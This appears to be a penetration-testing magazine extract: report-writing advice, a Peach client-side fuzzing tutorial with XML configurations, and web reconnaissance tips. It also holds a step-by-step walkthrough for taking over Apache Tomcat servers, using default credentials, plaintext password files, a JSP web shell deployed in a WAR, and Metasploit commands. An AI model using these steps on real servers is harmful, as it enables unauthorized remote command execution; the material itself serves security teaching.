• As I said, I am conflicted about this, so if you are too, then by all means provide some tool data with your vulnerability reports. You just want to avoid copying and pasting the whole scan log into your report, for instance. Perhaps note in an "Identified by" section how you found the particular issue. This is a great place to include some tool data as it relates specifically to that vulnerability. Maybe even include a "here's how to test for this vulnerability yourself with tool x" bit in there. Again, it's about educating your audience.
• Don't be shy about saying what tool you used to find what. This shows proficiency in your craft, unless of course you used Web Killer 2020 as the only tool. That just shows a lack of attention to detail. Yet another example from my report review: EVERY vulnerability was found with AppScan. Now I'm not denigrating AppScan at all (that's another article), but it should never, ever be the only tool you use in your work. No tool should be. You should develop a varied ecosystem of tools that you use in particular circumstances, and don't be afraid to add new ones, after an appropriate test period of course.
• Open source tools: do you use them? If not, you should add some to your arsenal. My philosophy is and always has been that an attacker, kiddie or otherwise, is NOT going to go out and spend $50,000 on a tool to exploit some hole; they will probably pirate it. Seriously though, they will go get some open source tool or write their own. Either way, the giant price tag tools will not help you in all these circumstances. One word of caution: don't just blindly include open source tools' data in your reports (you really should never blindly do anything, of course), the reason being that the authors sometimes like to use colorful language you may not want your end audience to see.
• Generally speaking though, keep your report to the analysis of the results of all these various tools, and learn to manually verify the results. This analysis is the value you provide. It's one thing to penetrate a network, but if you can't explain how you did it, did you really do anything of worth? If you aren't providing value then you are just a paid button-pusher, and that's not really what you want to be, is it?

Reporting from Experience

Your client or employer didn't hire you for your looks. You were hired, presumably, because you have some experience in this field, so why are you not using it? Reporting from experience is quite powerful. The phrase "I've seen this before" is the ultimate confidence builder; it is what managers live for. Being able to relate an issue or vulnerability back to past experience is a powerful way of saying "I've seen this before and here's what we should do." You should be doing that.

• If you're a third party tester, tell your client if you've seen the exact issue before and explain what your previous client did about it. This is a great reporting technique and relays your experience with confidence. It allows you to provide a track record of a particular remediation technique for your customers. Possibly you could even build a trust factor into your remediation solutions. This could be an article in and of itself, but basically you're putting a score on your confidence that a given solution will work for a particular issue. Customers and other departments will like that.
• If you are an internal resource without much exposure to other networks or apps, or you don't have a lot of experience, then do some research about the vulnerability. "Here's how XYZ fixed it, according to Google." Okay, maybe it's not THAT simple, but a little research and effort can go a really long way toward building an effective report.
• This applies to everyone. Once you have tested and manually verified the vulnerabilities, do some research on the issues. Did a major breach occur somewhere else because of this vulnerability? That's something you should be reporting. "XYZ leaked 10,000 credit card numbers due to a SQL injection closely related to vulnerability XXX" is quite a bit more powerful than "you have some SQL injection and I can insert my name into your database." The more convincing you make your argument, the less likely a client or other department is to counter with the old "well, it's not that big a deal, we'll fix it later." Sadly, that is a prevailing attitude, and it can be corrected with this approach.

Remediation

I have noticed, both from the reports I've reviewed and from just being in the industry for a while, that a vast majority of penetration testers shy away from even mentioning remediation techniques.
This is a shame to me, as I think testers can bring a very unique perspective to the remediation process. I'm not completely sure of the reasoning behind the shyness, but I can guess.
At any rate, I think offering some remediation advice in reports is invaluable when looking at these things from an operations perspective. A question I get quite a bit from my customers is "okay, I've got this report from vendor X, how do I fix this stuff?" No one is an expert in everything, so while you can provide some advice, be honest about where your expertise lies. Go gather some external resources to help you out where your skills might be weak; this helps build the experience I discussed earlier. On with the list.


• Each vulnerability should have a remediation section. It should explain some possible fixes to the issue along with well known industry best practices for fixing it. (A sketch of a finding record with such a section follows this list.)
• Stop simply listing links to remediation resources. While I think a resource and reference section is useful and valuable, it cannot be the only remediation advice you supply. You are being paid for your advice; don't chicken out.
• If you have previous experience with a particular issue, then note that in your report. Offer some sort of special assistance with that issue; don't just be a paper generator.
• Some would argue that offering remediation advice limits your objectivity. I would argue it helps you know your client better, builds your testing skills and keeps your other skills sharp. It's really a win all the way around.
• I touched on this one before, but it is worth repeating, I think. Learn to speak the language of your audience. It is worth the time investment to communicate with your end audience in a way they're accustomed to. Don't make them learn a new language to read your report. That approach leads to reports sitting on a shelf with no action taken.
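As a sketch of a finding record with a mandatory remediation section, along the lines argued above (the field names are illustrative, not any standard):

finding = {
    "id": "001-web-010",
    "title": "SQL injection in login form",
    "severity": "high",
    "evidence": "POST /login, 'username' field; see packet capture login.pcap",
    "identified_by": "manual testing, confirmed with a scanner",
    "relates_to": ["001-web-011"],
    "remediation": {
        "advice": "Use parameterized queries; validate input server-side.",
        "references": ["https://owasp.org/www-community/attacks/SQL_Injection"],
        "seen_before": "A previous client fixed this with prepared statements; "
                       "no recurrence on re-test.",
    },
}

for key, value in finding.items():
    print(f"{key}: {value}")

Note that the advice and the references are separate fields: the links support the advice, they do not replace it.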

Re-test

Once vulnerabilities are fixed, they should be re-tested to be sure the fixes work. We typically include this as part of an up-front engagement, but however you do it, make sure it gets done. This does a lot to reinforce your initial testing, but primarily it provides a metric to show how serious a company or department is about fixing vulnerabilities. It can even be used to show how a company or department measures up to another organization or department as it relates to remediation. Not to say that people respond to competition, but people respond to competition. It is just human nature.

• Simply running through the evidence sections of the initial vulnerability report might suffice for a re-test. However, I recommend a more thorough re-testing, as an applied patch or a fix in one script might have introduced some new exploitable hole. You will want to try to find those on a good re-test.
• Once you have completed the re-test, you should update your report with the results of that testing. I like the change log format that shows when something was discovered and when something was resolved; a small sketch follows this list. If a given issue was not resolved, you can note that in the same format.
• Don't be afraid to update your remediation advice on a re-test. No one is perfect; it's okay. If you find that a particular technique doesn't work for resolving an issue, note that and find a technique that does. This can be included in the trust factor mentioned above, allowing you to scale your confidence in a given fix more easily.
• What if you find a new issue during the re-test? Then you are doing your job. Make a new vulnerability report and let your client know, then begin the same process all over again. This just makes you a better tester, as you will learn to be more and more thorough as you go on.
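A small sketch of that change log format (the dates and IDs are invented):

changelog = [
    ("001-web-010", "2011-03-02", "2011-04-11", "fixed, re-test passed"),
    ("001-web-011", "2011-03-02", None, "open, remediation advice updated"),
    ("001-net-004", "2011-04-11", None, "NEW: found during re-test"),
]

print(f"{'ID':<12} {'Discovered':<12} {'Resolved':<12} Status")
for vuln_id, found, fixed, status in changelog:
    print(f"{vuln_id:<12} {found:<12} {fixed or '-':<12} {status}")

One row per finding, one glance to see how seriously the fixes are being taken.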

Report Tips

Before I wrap up, I wanted to review some general reporting tips.

• Provide a cheat sheet so that your end audience can quickly see a general summary of what is in the report. I am a huge fanboy of cheat sheets; I'm fairly convinced that if properly used they can do anything.
• Remember that these reports will probably be very chunked up when delivered to the various remediation teams. Provide the report in a format that is easy to break apart and can stand on its own.
• Provide a guide to using your report. Help files are wonderful; a tutorial on how to read the report would be great. This helps end audiences know where they're supposed to look for things, etc. Now, needing this violates the keep it simple principle, but it removes any confusion. Remember, what is simple to you might not be to someone else.
• Make sure you provide a method for your end audience to comment on your report or ask questions. A wrap-up meeting or conference call is always the best way to accomplish this. You should always be able to defend and explain your work.
• Do not just leave a stack of paper on your customer's desk. Be available to help, explain, defend, etc. You should not be a hit and run penetration tester.

As I re-read this article, I realize it probably sounds very condescending to experienced testers. If that is the case, then this article is not for you. Based on this review of some big name firms' testing reports, though, a lot of folks need a refresher course in report writing. These tips apply to whatever sort of testing you are doing. From physical penetration to social engineering to remotely exploiting a server, all of these things require proper and useful reporting. Your hard work and your end customers deserve nothing less.

BILL MATHEWS
Bill Mathews is co-founder and lead geek of Hurricane Labs, an information security firm founded in 2004. Bill wrote this article while recovering from pneumonia, so any errors are purely the result of medication. :-) You can reach Bill @billford on Twitter and read his other musings on http://blog.hurricanelabs.com


BLACK BOX

How Fuzzy Are You Today?
A Guide to Client-Side Fuzzing Using Peach

What do you do if your targets are fully patched and you do not find any configuration issues during a penetration test? Do you take the blue pill and tell the client he's safe (and everybody's happy), or do you take the red pill and go deep into the rabbit hole to find those hidden bugs? Let's take the red pill and see what happens...

This article does not disclose any vulnerabilities; it presents a generic way of finding vulnerabilities by doing client-side fuzzing, using the Peach fuzzing framework. You will also find an example of how to fuzz an HTTP client by feeding it malformed HTTP response headers.


Bug hunting today

Nowadays, it is not easy to find vulnerabilities in decent software. Besides the high amount of time and resources you must spend finding vulnerabilities, your chances are lowered by the fact that decent software vendors may have a well-defined quality assurance program. This program may not be limited to functionality testing only; it may also include security testing using some of the methods described below.

Figure 1. Gaining access by attacking the client
Figure 2. Sequence of events for client-side fuzzing

Nevertheless, finding exploitable vulnerabilities is a rewarding activity. Some of the best vulnerability researchers may win substantial prizes at hacking competitions such as Pwn2Own, or they could make money on their findings by selling their code on the legitimate/illegitimate exploit markets.

How do we find those bugs?

There are a few approaches that can be used for finding security vulnerabilities. Each has its pros and cons and should be chosen according to your situation (software vendor, penetration tester, bug hunter, etc.). If you have the source code of the target application, you can do a source code review and try to identify exploitable weaknesses. Without the source code, reverse code engineering might be a choice, but it's a painful activity for medium and large applications.
A common approach to vulnerability discovery is black-box testing. Fuzzing is a method of doing black-box testing by analyzing the application according to its inputs and outputs, having little knowledge of what's inside.
What do you think will happen if the following C function is called with an argument passed directly from user input?

void function(char* user_input) {
    char local_buf[500];
    sprintf(local_buf, "Received from user: %s", user_input);
}

Depending on the input data, it can behave normally or it can crash (Access violation when writing location... / SIGSEGV). Of course, this is a piece of unmanaged code written in C, which does not benefit from the security mechanisms offered by a runtime environment, like C#, VB or Java code does.
Hence, there are some classes of bugs (buffer overflows, integer overflows, format string issues) which are prone to be found in unmanaged code (C/C++). These types of bugs will be the target of our discussion in this article.

Attack the server or the client?

The number of server applications is considerably smaller than the number of client applications. Furthermore, servers are more often updated and patched, while client applications are often neglected (each user can have a different version of the client application).
Listing 1. Param element

<Peach>
	<Include ns="default" src="file:defaults.xml" />
	<Run name="DefaultRun">
		<Test ref="test1"/>
		<Logger class="logger.Filesystem">
			<Param name="path" value="c:\tools\fuzzers\peach2.3.8\peach\logs" />
		</Logger>
	</Run>
	<!-- other elements described below -->
</Peach>

Listing 2. Launching the target application under a debugger

<Test name="test1">
	<StateModel ref="sm"/>
	<Agent ref="windbg"/>
	<Publisher name="socket" class="tcp.TcpListener">
		<Param name="host" value="127.0.0.1"/>
		<Param name="port" value="80"/>
	</Publisher>
	<Publisher name="launch" class="process.DebuggerLauncher"/>
</Test>

Figure 3. Peach XML elements hierarchy
In the vulnerability research area, there has been a considerably greater effort in fuzzing servers than fuzzing clients. The reason for this is that clients are considered less important than servers; this is a seriously wrong assumption. Since a server trusts a client, the client becomes an extension of the server's domain of trust (see Figure 1).
So let's attack a client. We will show how the Peach fuzzing framework can be used to act as a server and send malformed input to clients.

Building a client-side fuzzer

If you want to fuzz, you need a fuzzer. You can write it yourself or you can use one of the many existing fuzzers on the net. Using one of these pre-existing fuzzers may or may not fully meet your expectations or needs.
If you still do not want to write your own fuzzer, you can use a fuzzing framework to build a custom fuzzer to fulfill your needs. Well-known fuzzing frameworks include Spike, GPF, Sulley, Autodafe and Peach (which we'll discuss in this article).
Regardless of the network protocol, we want our fuzzing setup to follow the steps described in Figure 2. Let's see how we can implement this diagram in Peach.

Listing 3. Actions within a State

<Agent name="windbg">
	<Monitor class="debugger.WindowsDebugEngine">
		<Param name="CommandLine" value="c:\Program Files\Mozilla Firefox\Firefox.exe http://127.0.0.1/" />
		<Param name="StartOnCall" value="dostart" />
	</Monitor>
</Agent>

Listing 4. StateModel

<StateModel name="sm" initialState="initial">
	<State name="initial">
		<Action name="start_listen" type="start" publisher="socket"/>
		<Action name="start_target" type="call" method="dostart" publisher="launch"/>
		<Action name="accept" type="accept" publisher="socket"/>
		<Action name="recv" type="input" publisher="socket">
			<DataModel ref="Request_Model"/>
		</Action>
		<Action name="send" type="output" publisher="socket">
			<DataModel ref="Response_Model"/>
		</Action>
		<Action name="stop_target" type="stop" publisher="launch"/>
		<Action name="stop_listen" type="stop" publisher="socket"/>
	</State>
</StateModel>

Listing 5. Hello from server

<DataModel name="Request_Model">
	<String name="client_request"/>
</DataModel>

<DataModel name="Response_Model">
	<String value="hello from server"/>
</DataModel>

About Peach

Peach is a fuzzing framework, written by Michael Eddington, which is capable of performing both generation- and mutation-based fuzzing. The terms generation fuzzing and mutation fuzzing refer to the way the fuzzer creates output data.


Generation-based fuzzing uses a specification (e.g. an RFC) of the fuzzed protocol or file format to generate output data which is close to the format accepted by the application.
Mutation-based fuzzing takes another approach to data generation. It starts from valid data (i.e. a valid file, network packet, etc.) and performs various modifications (i.e. mutations) in order to trigger vulnerabilities in the target application.

Our custom fuzzer must be described in a Peach Pit file, which is actually an XML file that defines the structure, type information, and relationships in the data to be fuzzed. The hierarchy of these elements is shown in Figure 3.
The top element is Peach, which is just a container for the other elements. When we start Peach, we actually tell the fuzzing framework to use one Run element from the XML file. One Run must contain at least one Test and an optional Logger. The Test contains a State Model (which is a series of States), an optional Agent (for instrumenting the target application) and one or more Publishers (used for transmitting data).

Inside a certain State, the fuzzer can perform various Actions (e.g. send data, receive data, open/close files, etc.). Actions are performed using data described by a Data Model. In order to specify certain values to be used in the Data Model, we can use a Data element with the necessary Fields.
Peach XML elements can be referenced inside other elements using the ref attribute and specifying the name of the referenced element (which can be defined elsewhere).
Each element can have a certain class attribute. The best reference for Peach element classes is the source code (Python), which can be downloaded freely from www.peachfuzzer.com.
Let's see how we can model the client-side fuzzer in a Peach Pit file.

Creating a custom fuzzer with Peach

In the main Peach element (Listing 1) we must include the file defaults.xml, which is the configuration file for this Peach instance. This file should set up the proper paths to indicate where Peach is located and also import the standard modules.
The Run element defines the starting point of the fuzzer and contains a reference to a Test element and a Logger. The Logger specifies where log messages should be written. As you can see, some elements require parameters specified by a Param element.
We go on detailing the referenced Test element. As you can see in Listing 2, inside a Test we specify a reference to a StateModel, a reference to an Agent element and two Publishers. We differentiate Publishers by their name. The publisher named socket tells Peach to start a TCP listener on localhost, port 80, in order to behave as a server. The other publisher, launch, will be used to launch the target application under a debugger.
The Agent that we configured (Listing 3) is a local process which activates a Monitor component, which is in fact a Windows debugger that starts the target application. One important aspect is the parameter called StartOnCall, which tells the agent to start the Monitor only when an Action of type call happens with the value/method dostart. In this way, we can control the behavior of the target application from the Actions within a State.
The XML element that models the states and transitions our fuzzer will follow is called StateModel (Listing 4). In our case, it contains a single State called initial. Inside this state, we command Peach to perform the following Actions on specific Publishers (according to Figure 2):

•	Publisher socket: open socket and start listening
•	Publisher launch: start target under debugger
•	Publisher socket: accept incoming connection (blocking operation)
•	Publisher socket: read input from client into DataModel Request_Model
•	Publisher socket: send output to client from DataModel Response_Model
•	Publisher launch: stop target
•	Publisher socket: close socket

Listing 6. Launcher.html

<html>
<body>
Let's eat some malformed HTTP responses <br>
<script type="text/javascript">
var timeout = 500;
var id = "myiframeid";
function setIframe() {
	var iframe = document.getElementById(id);
	if (iframe) {
		document.body.removeChild(iframe);
	}
	iframe = document.createElement("iframe");
	iframe.setAttribute("src", "http://127.0.0.1");
	iframe.setAttribute("id", id);
	document.body.appendChild(iframe);
	setTimeout("setIframe();", timeout);
}
setTimeout("setIframe();", timeout);
</script>
</body>
</html>

Figure 4. Running our fuzzer in debug mode (Part 1)

Figure 5. Running our fuzzer in debug mode (Part 2)
Listing 7. Response_Model

<DataModel name="Response_Model">
	<String value="HTTP/1.1 204 No Content\r\n" isStatic="true"/>
	<String value="Set-Cookie: " isStatic="true"/>
	<String value="cookie_name"/>
	<String value="=" isStatic="true"/>
	<String value="cookie_value"/>
	<String value="; " isStatic="true"/>
	<String value="path=" isStatic="true"/>
	<String value="/"/>
	<String value="; " isStatic="true"/>
	<String value="expires=" isStatic="true"/>
	<Block name="date">
		<String value="Thu"/>
		<String value=", " isStatic="true"/>
		<String value="01">
			<Hint name="NumericalString" value="true"/>
		</String>
		<String value="-" isStatic="true"/>
		<String value="Jan"/>
		<String value="-" isStatic="true"/>
		<String value="2020">
			<Hint name="NumericalString" value="true"/>
		</String>
		<String value=" " isStatic="true"/>
		<String value="00">
			<Hint name="NumericalString" value="true"/>
		</String>
		<String value=":" isStatic="true"/>
		<String value="01">
			<Hint name="NumericalString" value="true"/>
		</String>
		<String value=":" isStatic="true"/>
		<String value="03">
			<Hint name="NumericalString" value="true"/>
		</String>
		<String value=" " isStatic="true"/>
		<String value="GMT"/>
	</Block>
	<String value="\r\n\r\n" isStatic="true"/>
</DataModel>

For this skeleton fuzzer, we do not specify any fancy data model, just an input string and an output string. We expect the client to send a request (that will be stored in a DataModel) and the fuzzer will respond with the (fuzzed) message: hello from server. See Listing 5.
Before running the fuzzer, it is a good idea to test our Pit file (using the -t switch). If there are no parsing errors, we can start the fuzzer in debug mode to see what exactly is happening. We can see in Figure 4 and Figure 5 how the framework runs all the actions that we've configured, the request message and the response message.
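As a rough sketch of those two steps from the command line (the Pit file name here is illustrative, and the exact peach.py invocation may vary with your Peach 2.x installation):

python peach.py -t http_client_fuzz.xml    (check the Pit file for parsing errors first)
python peach.py http_client_fuzz.xml       (then start the fuzzer for real)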
Even though this mechanism is generic for client-side fuzzing (you can fuzz any client application), it is rather slow, because the fuzzer opens and closes the target application for each response generated (for example, Firefox takes about 2-3 seconds to start and make the HTTP request on my machine). Depending on the target application, we can optimize the fuzzing mechanism to be faster.
In the case of a web browser, we can start it just once and load the HTML file from Listing 6. It will automatically reload every 0.5 seconds and make a new HTTP request to our fuzzer at http://127.0.0.1. The Monitor element from Listing 3 must be modified as below (no need for the StartOnCall parameter):

<Monitor class="debugger.WindowsDebugEngine">
	<Param name="CommandLine" value="c:\Program Files\Mozilla Firefox\Firefox.exe C:\tools\fuzzers\peach\Peach2.3.8\mytest\launcher.html" />
</Monitor>

Now that we have the fuzzing mechanism working more efficiently, let's focus more on the output data. Let's suppose we want to fuzz the web browser's capacity for handling the HTTP Set-Cookie header. We want to send the browser HTTP responses like:


HTTP/1.1 204 No Content
Set-Cookie: cookie_name=cookie_value; path=/; expires=Thu, 01-Jan-2020 00:00:01 GMT

Figure 6. HTTP requests and fuzzed HTTP responses

For this, we need to modify our data model named Response_Model as shown in Listing 7. The elements that we do not want to be fuzzed are marked with isStatic="true". We organized the date into a Block element so it can be referenced later in the Data Model, if necessary. Please observe the Hint added to the String element, which tells the fuzzer to produce numbers as strings, not as integers.
Using the Live HTTP Headers add-on, we can see the headers exchanged between the target application (Mozilla Firefox) and our fuzzer.
Any crashes or abnormal events will be reported in the log file that we've configured; however, crash analysis is another aspect of fuzzing and it is beyond the scope of this article.

Conclusion

Penetration testing is not limited by the power of vulnerability scanners or common manual checks. We know that there is no application that is 100% secure, so it's just a matter of time and work before those hidden vulnerabilities come to light.
Fuzzing is a way of finding those vulnerabilities. Although it doesn't offer any guarantee of success, it might work when everything else fails. Depending on the timeframe of the pentest engagement, digging for zero-days can provide interesting results.
Creating a custom fuzzer using a fuzzing framework is faster than writing a dedicated one, but customizing the fuzzing framework can be time consuming at the beginning (until you obtain the desired behavior). In the case of Peach, the learning curve is pretty steep; however, Peach is a very powerful and complex fuzzer that has the potential of finding deeply hidden vulnerabilities.

ADRIAN FURTUNA
Adrian Furtuna works as a Senior Advisor at KPMG Romania, where he is involved in penetration testing, vulnerability assessment and security audit projects. Adrian has a particular interest in offensive security techniques, which he studies as part of his PhD program at the Military Technical Academy of Bucharest. He has also published a number of scientific articles at various conferences discussing Red Teaming activities, cyber defense exercises and denial of service attacks. Adrian can be contacted by email at adif2k8@gmail.com.

Comment
Clients Less Important Than Servers

I believe that Furtuna is exactly right about clients being treated as less important than servers. Through my years as a penetration tester, I have seen my clients spend a lot of time and resources to lock down their servers. Overall, they do a pretty good job at this; however, client systems are treated like red-headed stepchildren. They are seldom managed in the same ways as the critical servers. As Furtuna points out, clients become an extension of the server's domain of trust and should be taken into consideration in the organization's entire security posture. I can't tell you how many times I have personally gained root access to an entire domain through the lack of controls over a client device. And of course, finding a vulnerable client-side application through the fuzzing example explained in this article is just one of the many ways that root access can be obtained.


JOHN J TRINCKES, JR.
John J Trinckes, Jr., CISSP, CISM, CRISC, CTGA, C-EH, NSA-IAM/IEM, MCSE-NT, A+, is the author of The Executive MBA in Information Security, published by CRC Press, and co-founder of KeeDragon.com.


NETWORK SECURITY

Dueling Apache Tomcat

Setting up a JSP-enabled web server is cumbersome and complex. Apache Tomcat aims to solve this dilemma by providing a quick, easy, and cost-effective solution for developers to deploy their applications and services. While this is great for functionality, its default configuration can greatly decrease the security of a network.

In this article, we will explore these vulnerabilities and how penetration testers can use them to their advantage. During many penetration-testing engagements, we have found installations of Apache Tomcat that have been left with the default configuration settings in place. In fact, while the installation process is quick and easy, it does not lead the administrator through important settings, forcing a post-installation review that is sometimes easily forgotten. After reading this article, remote command execution could be something as simple as Figure 1.

Step One: Identification

Figure 1. Remote Command Execution through a Web browser

Figure 2. Default page for Apache Tomcat

The first step is to identify which systems have Tomcat installed; commonly used TCP ports are 80 and 8080. A quick port scan will do the trick, or you can manually connect to these ports with your browser and find a web page similar to the one depicted in Figure 2.
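For instance, a quick sweep with nmap (the target subnet below is just an example) will list hosts with those ports open, and the -sV option will often reveal the Tomcat version banner as well:

nmap -p 80,8080 --open -sV 192.168.1.0/24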

Step Two: Authentication

The second step is to authenticate to the Tomcat web-based administration tools, Tomcat Manager or Tomcat Administration. As of Tomcat v5.5, the Tomcat Administration web console is no longer installed by default. If you are able to find it installed on the server, you are in luck. The default username for Tomcat Administration is admin and the password is admin or blank. Once you click on Tomcat Administration, you should see a page similar to the one depicted in Figure 3.


Figure 6. Tomcat Web Application Manager

Figure 3. Tomcat Administration login page

If you are able to log in, you will be able to view server settings and manage users. You can also grab the passwords for the other default users, such as tomcat or role1, by looking at the HTML code of the Users page within the User Definition section.
Quick Tip
You can use Metasploit to scan the network for Apache Tomcat installations in order to identify the administration console. You can also perform a password dictionary attack to guess the correct username and password. The auxiliary module to accomplish this is named: Tomcat Administration Tool Default Access.
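In msfconsole, that might look like the following sketch (the module path shown is from Metasploit builds of that era; verify it with search tomcat in your version, and adjust RHOSTS/RPORT to your target):

msf > use auxiliary/admin/http/tomcat_administration
msf auxiliary(tomcat_administration) > set RHOSTS 192.168.1.0/24
msf auxiliary(tomcat_administration) > set RPORT 8080
msf auxiliary(tomcat_administration) > run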
Whether the administration console is installed or not, we can move on to our next target, which is the Tomcat Web Application Manager. We can use the same admin password that was discovered earlier to log in. The Tomcat Web Application Manager looks like Figure 6.

The web console permits users to completely control applications, i.e. uploading, deleting and modifying them, but for the sake of our discussion let's focus on uploading. Tomcat, being a JSP-enabled web server, accepts applications that are packaged as Java Web Application Archive files, or simply WAR. In order to utilize this, we must include a JSP web shell in our WAR file.
Quick Tip
You might not be able to successfully guess the login credentials for web tool management. There still is a way to authenticate to the server. If you have regular-user or read access to the system, review the tomcat-users.xml file located in the following path: C:\Program Files\Apache Software Foundation\Tomcat 5.0\conf. Just replace this with the server's path to Tomcat. The usernames and passwords for Tomcat are configured in plain text within this file, as shown in Figure 7.
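A stock tomcat-users.xml is only a few lines long; the entries below are illustrative defaults of that Tomcat generation, not a reproduction of the article's figure:

<tomcat-users>
	<role rolename="tomcat"/>
	<role rolename="role1"/>
	<role rolename="manager"/>
	<role rolename="admin"/>
	<user username="tomcat" password="tomcat" roles="tomcat"/>
	<user username="role1" password="tomcat" roles="role1"/>
	<user username="admin" password="admin" roles="admin,manager"/>
</tomcat-users>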

Figure 4. Tomcat web administration of users

Figure 5. User passwords in the html source code

Figure 7. Tomcat configuration files store passwords in plain-text

Figure 11. Creation of a new Context

Figure 8. Example of WAR content

Figure 12. Web Shell

Figure 9. Adding the web shell to the WAR package

Step Three: Control

During this step, we are going to modify a WAR file to include a web shell to execute operating system commands via our browser. Let's start by downloading a sample WAR file such as: http://tomcat.apache.org/tomcat-5.5-doc/appdev/sample/sample.war.
The content of the WAR file can be shown by an archive tool like 7-Zip, as in Figure 8. The next step is to add a JSP web shell like, for example: http://net-square.com/papers/one_way/one_way.html#4.0.4.
Copy the source code into a text editor like Notepad and save it with the filename cmdexec.jsp. Drag this file into the contents of the WAR file and we get a cooked archive like Figure 9.
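If you prefer the command line over an archive tool, the JDK's jar utility can do the same repackaging (file names follow the example above):

jar -uf sample.war cmdexec.jsp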
The last step is to upload the cooked WAR package through the Tomcat Manager: in the Deploy section, select the WAR file to deploy using the Browse button, and then the Deploy button does the magic. When the upload is finished, the Tomcat Manager shows an OK message and a new web application appears, as in Figure 11.
The cmdexec.jsp web shell from our new application is now ready to be used, as we can test in a local installation of Tomcat: see Figure 12.
Remember the first figure of this article? The shell command whoami was simply entered in a form like the one above. Our pentest is over: we have demonstrated complete control of the system, because any command can now be executed remotely.

Figure 10. Deploying the cooked WAR package
Quick Tip
By default, the Tomcat service is installed under the SYSTEM account in Microsoft Windows. This account has more rights than even the local Administrator account.

Quick Tip
The testing we have seen can be automated by using Metasploit with the exploit named: Apache Tomcat Manager Application Deployer Authenticated Code Execution, but consider that sometimes it doesn't provide reliable results and the manual approach should be chosen.
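A hedged sketch of that exploit in msfconsole (module path and option names as commonly found in Metasploit builds of that period; check show options in your copy, and pick a payload your target supports):

msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.1.10
msf exploit(tomcat_mgr_deploy) > set RPORT 8080
msf exploit(tomcat_mgr_deploy) > set USERNAME admin
msf exploit(tomcat_mgr_deploy) > set PASSWORD admin
msf exploit(tomcat_mgr_deploy) > exploit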

JOVON ITWARU
Jovon Itwaru is lead security analyst at Core Defend Technologies. He provides a holistic approach to security that allows clients to better understand security and the role they must take in proactively defending their network. He can be reached at jovon@coredefend.com. More information about the company can be found at http://www.coredefend.com.


WEB APPLICATION SECURITY

Heuristic Methods vs. Automated Scanners

Which is the most efficient? Humans? Machines? Or the two in tandem?
As most penetration testers know, a manual check of a Web Application can be much more thorough than a completely automated one. By combining a few assistant tools, for example an intercepting proxy (see Figure 1) and perhaps a vulnerability scanner that may find overlooked parts, one can improve his or her assessment of actual vulnerabilities.

The manual methodology, however, differs appreciably from one ethical hacker to another, and in many cases only very basic (common) approaches are used.
By using a heuristic method manually, the efficiency of finding a vulnerability within the target web application can increase drastically. So what exactly is this methodology to which I'm referring? It may seem quite common to some individuals, even though it hasn't been publicly shared yet (except, of course, in this magazine). Creating a fuzz-word (also known as an XSS-locator string) is the first step, as this can break almost any non-sanitized function relying on proper syntax, Cross-Site Scripting (XSS) issues, and almost any other input validation vulnerability.
This is only the first step; the second step or goal is to know how WordPress, vBulletin, Joomla, etc. look, not only in HTML source code but also by design. The colours and various other elements may have been changed, but generally the blocks where information is displayed are usually at the same location on every site. This makes it easy to see if the site runs a custom-made or a well-known CMS.
For example, vBulletin 4 almost always has the login field in the top right, and within the source code, in the header fields, there's usually a line of included JavaScript code (see Figure 2) which reveals the overall version (rarely the patch level).
This would indicate that the target is running vBulletin 4.1.2, and by looking in the JavaScript file the patch level may be revealed, depending on how the administrator updated the forums the last time he or she did so. With Joomla it's common to see com_xxx in the source, and with WordPress a common item within the source would be wp-content.

Figure 1. Burp Suite Free: Spidering a website

Figure 2. Firebug: Viewing a JavaScript file


Figure 4. Exploit-DB: Searching for vBulletin Exploits


Figure 3. FireFox: Viewing the HTML source of a website

Those are just examples, but more important is to know what a default installation looks like as compared to one with add-ons. Some add-ons are hard to spot, almost transparent, while some leave comments within the source like <-- Super Insecure Addon 1.2.3 --> (see Figure 3), which gives the advanced penetration tester an advantage, since he or she can then just download the add-on, look for vulnerabilities within it, and perhaps find a 0day exploit!
But why find an unknown vulnerability within the target web application? Maybe it's fully up to date and patched, so there are no other ways of entry after a very thorough and automated scan has been done. In these cases a penetration tester could, if time allows it, look for these so-called 0days.

The Difference in Development Life Cycles

So far, many automated scanners would have found nothing or almost nothing, because they're not designed to find all kinds of 0days, but hopefully most penetration testers are. One should understand, however, that it may be extremely time-consuming to find some of these exploits by hand. Some of these unknown vulnerabilities are often found by accident, if the target web application is a well-known one or has at least had a good Secure Development Life Cycle (SDLC).
If the target web application didn't have any security applied at the development phase, an automated scanner would probably pick up vulnerabilities in a matter of seconds; and if the web application did have security somewhat applied, an automated scanner might not find any of the vulnerabilities, but a penetration tester with the right knowledge, not wanting to look through hundreds or thousands of lines of code, would probably find one or several vulnerabilities.
The biggest danger is that the developer decides that the scanner he has chosen is the best and the only right tool to use, and if that returns no vulnerabilities (false negatives), then there aren't any. Therefore, if a human penetration tester and not just an automated scanner had tested the application, it would have been more secure and not contained several security issues.



The Backend + (Fingerprinting & Subdomains)

Another important factor is the backend: the web server is a major part of this, but so also is the coding language used, both of which may give the penetration tester an idea of which vulnerabilities to expect. A common vulnerability for too many ASP(X)-powered sites would be the infamous search.asp?q=XSS vulnerability, which is often non-persistent (reflected), yet still a vulnerability.
Imagine a website running vBulletin, which is a forum web application. The footer containing the version information is removed, and the generator meta header is also removed. The general design is heavily altered, but it still looks somewhat like vBulletin. So the penetration tester assumes he or she can use the version disclosure trick shared earlier in this article to find out which version is installed. If a vulnerable version is found and there's a public Proof of Concept available (see Figure 4), then the penetration tester has already made one foothold, depending on the type of vulnerability.
Now imagine another website, perhaps a custom-built one where an automated scanner returns no results. Still, almost all web applications or custom websites contain at least one vulnerability, because sometimes the vulnerable applications are located on outdated subdomains.
In order to find these subdomains, which are often on the same server, the penetration tester can use (e.g.) Google if the target's nameserver does not allow AXFR requests, which potentially could return a zone transfer (see Figure 5).
In this case all the subdomains point to the same IP address, which the penetration tester is allowed to test, including all vhosts (Virtual Hosts) on the webserver. Each virtual host can have its own physical directories separate from the others, and these can even contain vulnerable code as well! Therefore it is logical to test these if they are within the scope of the penetration test.
The query that most automated scanners would most likely not even try could look like the one in Figure 6.
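Figure 6 itself is not reproduced here, but based on the description later in this section, a query of that shape (the domain is purely illustrative) might be:

site:example.com -site:www.example.com ext:php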
Figure 5. dig: Requesting a DNS Zone-Transfer
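The zone-transfer attempt shown in Figure 5 is the standard dig invocation (name server and domain are placeholders):

dig axfr example.com @ns1.example.com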


